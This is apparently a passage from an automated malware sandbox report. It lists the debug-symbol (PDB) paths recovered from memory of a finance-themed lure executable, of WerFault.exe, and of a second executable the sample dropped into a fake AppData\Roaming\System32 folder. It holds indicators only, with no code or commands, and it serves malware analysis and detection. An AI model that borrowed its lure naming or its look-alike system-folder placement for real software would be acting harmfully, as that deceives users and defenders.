Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbCE source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp
Source: Binary string: bcrypt.pdb1 source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000C.00000003.668670088.00000000030C8000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.721650694.00000000006C6000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.733540972.0000000003285000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb8 source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
Source: Binary string: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.PDB@Jh source: PxxoServicesTrialNet1.exe, 00000010.00000002.775167654.0000000001538000.00000004.00000001.sdmp
Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
Source: Binary string: System.Core.pdb" source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbtE source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp
Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbkE source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
Source: Binary string: CLBCatQ.pdbC source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701291575.0000000001499000.00000004.00000020.sdmp
Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
Source: Binary string: ole32.pdbX source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: rsaenh.pdb+ source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: cryptsp.pdb= source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: edputil.pdbY source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: profapi.pdbv source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: wimm32.pdb7 source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: ole32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdber source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765835715.000000000121F000.00000004.00000020.sdmp
          Source: Binary string: propsys.pdba source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: msvcp_win.pdb, source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765835715.000000000121F000.00000004.00000020.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbWS source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: urlmon.pdbs source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb7cZ^ source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: WLDP.pdbl source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: iertutil.pdb2 source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdbq source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: iVisualBasic.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.698512628.00000000010F8000.00000004.00000001.sdmp, PxxoServicesTrialNet1.exe, 0000000F.00000002.765005138.0000000000EF8000.00000004.00000001.sdmp, PxxoServicesTrialNet1.exe, 00000010.00000002.775167654.0000000001538000.00000004.00000001.sdmp
          Source: Binary string: cldapi.pdb, source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: Windows.StateRepositoryPS.pdb% source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb~ source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701202553.000000000143F000.00000004.00000020.sdmp
          Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000C.00000003.668176403.00000000030C2000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.721203841.00000000006C0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.734239841.000000000327F000.00000004.00000001.sdmp
          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.PDB source: PxxoServicesTrialNet1.exe, 00000010.00000002.775167654.0000000001538000.00000004.00000001.sdmp
          Source: Binary string: rsaenh.pdbz source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: ml.ni.pdb" source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp
          Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: .pdbAx source: PxxoServicesTrialNet1.exe, 00000010.00000002.775167654.0000000001538000.00000004.00000001.sdmp
          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701291575.0000000001499000.00000004.00000020.sdmp, PxxoServicesTrialNet1.exe, 0000000F.00000002.765835715.000000000121F000.00000004.00000020.sdmp
          Source: Binary string: .pdb% source: WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000C.00000003.681925394.00000000052D0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.735005331.0000000004AC0000.00000004.00000040.sdmp
          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: msasn1.pdb" source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701306786.00000000014A8000.00000004.00000020.sdmp, PxxoServicesTrialNet1.exe, 0000000F.00000002.765835715.000000000121F000.00000004.00000020.sdmp
          Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: version.pdbb source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.PDB source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.698512628.00000000010F8000.00000004.00000001.sdmp
          Source: Binary string: cldapi.pdbk source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp
          Source: Binary string: psapi.pdb= source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: .pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp
          Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.pdb''J source: WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: System.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: psapi.pdb@ source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: Windows.Storage.pdb% source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000C.00000003.668152487.00000000030B6000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.720778134.00000000006B4000.00000004.00000001.sdmp
          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.PDBx source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765005138.0000000000EF8000.00000004.00000001.sdmp
          Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000C.00000003.681925394.00000000052D0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.735005331.0000000004AC0000.00000004.00000040.sdmp
          Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: propsys.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: msasn1.pdbp source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: wUxTheme.pdb/ source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: wUxTheme.pdb8 source: WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: version.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: CLBCatQ.pdbc source: WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp
          Source: Binary string: onfiguration.pdb source: WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbDs source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp
          Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: System.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbkw source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp
          Source: Binary string: onfiguration.ni.pdb@ source: WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000C.00000003.681925394.00000000052D0000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.735005331.0000000004AC0000.00000004.00000040.sdmp
          Source: Binary string: psapi.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701202553.000000000143F000.00000004.00000020.sdmp, PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbbg-6 source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701319384.00000000014AB000.00000004.00000020.sdmp
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000C.00000003.681869437.00000000051A1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734900230.0000000004AF1000.00000004.00000001.sdmp
          Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000C.00000002.697878831.00000000053F0000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000002.762864959.0000000004CD0000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000002.774116993.00000000054F0000.00000004.00000001.sdmp
          Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000C.00000003.668670088.00000000030C8000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.721650694.00000000006C6000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.733540972.0000000003285000.00000004.00000001.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp
          Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: EXTRACTOSERFINANZA989543704031499704092798964.PDB source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.698512628.00000000010F8000.00000004.00000001.sdmp
          Source: Binary string: combase.pdbk source: WerFault.exe, 0000000C.00000003.681835852.00000000052D1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734932038.0000000004AC5000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746862935.0000000002DE5000.00000004.00000040.sdmp
          Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000C.00000003.681825978.00000000052E5000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.734788443.0000000004AD5000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.746630451.0000000002DF5000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.PDBg[l_ source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765912392.0000000001282000.00000004.00000020.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000C.00000003.681843597.00000000052D8000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.734730861.0000000004AC8000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.746882968.0000000002DE8000.00000004.00000040.sdmp
          Source: Binary string: .pdbH source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.698512628.00000000010F8000.00000004.00000001.sdmp
